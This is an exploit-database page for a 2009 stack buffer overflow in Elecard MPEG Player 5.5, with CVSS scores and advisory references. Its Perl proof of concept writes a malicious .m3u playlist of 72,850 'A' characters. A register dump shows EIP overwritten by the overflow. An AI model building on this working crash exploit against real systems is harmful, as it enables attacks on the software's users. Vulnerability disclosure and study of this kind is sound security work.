Elecard MPEG Player 5.5 (.m3u File) Stack Buffer Overflow PoC

2009.02.10
Credit: aBo MoHaMeD
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl -w ######################################################################## #Program : Elecard MPEG Player #Version : 5.5 build 15884.081218 #website : http://www.elecard.com/download/index.php #Download : http://www.elecard.com/ftp/pub/mpeg/player/EMpgPlayer.zip #Type : * (.M3U) Buffer Overflow POC ######################################################################## #EAX 00000000 #ECX 41414141 #EDX 7C9037D8 ntdll.7C9037D8 #EBX 00000000 #ESP 0012BE40 #EBP 0012BE60 #ESI 00000000 #EDI 00000000 #EIP 41414141 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 1 DS 0023 32bit 0(FFFFFFFF) #S 0 FS 003B 32bit 7FFDF000(FFF) #T 0 GS 0000 NULL #D 0 #O 0 #EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE) #MM0 0020 0202 0000 001B #MM1 015A F2BC 8986 2BC0 #MM2 011C 0000 4020 027F #MM3 0000 0000 804D A735 #MM4 BADB 0D00 BF83 15E6 #MM5 8A1B EAB8 0000 0005 #MM6 0000 0000 0000 0000 #MM7 D1B7 1758 E219 6000 my $file="boom.m3u"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE "http://"."A" x 72850; close($FILE); print "$file has been created \n";

References:

http://www.milw0rm.com/exploits/7637
http://www.frsirt.com/english/advisories/2009/0007
http://secunia.com/advisories/33355
http://osvdb.org/51075


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top